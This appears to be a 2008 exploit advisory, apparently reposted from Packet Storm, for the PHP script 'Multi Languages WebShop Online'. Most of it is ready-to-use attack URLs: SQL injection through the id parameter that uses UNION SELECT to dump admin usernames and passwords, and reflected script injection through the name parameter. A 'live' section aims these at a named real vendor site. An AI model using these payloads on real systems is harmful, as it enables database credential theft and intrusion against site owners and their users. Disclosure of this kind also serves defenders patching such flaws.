Multi Languages WebShop Online suffers from cross site scripting and remote SQL injection vulnerabilities.
af0a843a330221c4d4380634b88d1f071aef4ed41aba48d0127332366f9ace0c-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Multi Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[~] Script: Multi Languages WebShop Online
[~] Language : PHP
[~] Website[0]: http://webbdomain.com/php/webshopir/
[~] Website[1]: http://www.hotscripts.com/Detailed/84437.html
[~] Type : Commercial
[~] Report-Date : 04/11/2008
--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>
--[ Exploit ]--
SQL => id
[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
XSS => name
[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13
[+][1] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]
--[ L!ve ]--
[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13
[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E
--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH, forgimme...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed